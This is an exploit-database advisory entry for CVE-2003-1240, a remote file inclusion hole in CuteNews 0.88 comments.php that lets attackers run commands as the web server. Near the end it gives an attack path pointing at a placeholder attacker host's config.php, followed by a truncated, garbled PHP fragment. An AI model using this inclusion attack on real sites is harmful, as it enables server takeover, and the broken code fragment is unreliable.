CuteNews 0.88 comments.php Remote File Include Vulnerability

ID EDB-ID:22285
Type exploitdb
Reporter Over_G
Modified 2003-02-25T00:00:00


CuteNews 0.88 comments.php Remote File Include Vulnerability. CVE-2003-1240. Webapps exploit for php platform

CuteNews is prone to an issue that may allow remote attackers to include files located on remote servers.
Under some circumstances, it is possible for remote attackers to influence the include path for several include files to point to an external file on a remote server.
If the remote file is a malicious file, this may be exploited to execute arbitrary system commands in the context of the web server.<attacker_site>/config.php

/", $item); if ($match[1]) { if (preg_match("/\//", $match[1])) { echo $match[1]; echo "
"; } } } ?>